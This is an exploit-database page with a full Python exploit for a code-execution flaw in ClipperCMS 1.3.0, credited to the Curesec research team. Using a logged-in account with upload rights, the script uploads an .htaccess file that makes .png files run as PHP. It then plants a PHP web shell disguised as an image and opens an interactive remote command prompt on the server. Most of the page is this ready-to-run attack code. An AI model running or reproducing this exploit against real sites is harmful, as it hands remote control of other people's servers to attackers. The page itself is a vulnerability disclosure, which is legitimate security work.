ClipperCMS 1.3.0 - Code Execution Vulnerability



EKU-ID: 5243 CVE: OSVDB-ID:
Author: Curesec Research Team Published: 2015-11-17 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com
 
import sys
import re
import requests # requires requests lib
 
if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
 
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
 
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
 
def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data = postData, headers = {"referer": url})
 
def getFullPath(requestSession, url):
    request = requestSession.get(url, headers = {"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)
 
def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
 
def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
 
def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")
 
requestSession = requests.session()
 
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)
 
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)
 
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")
 
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
 
if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")
 
runShell(url + "404.png?x=")
 
 
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html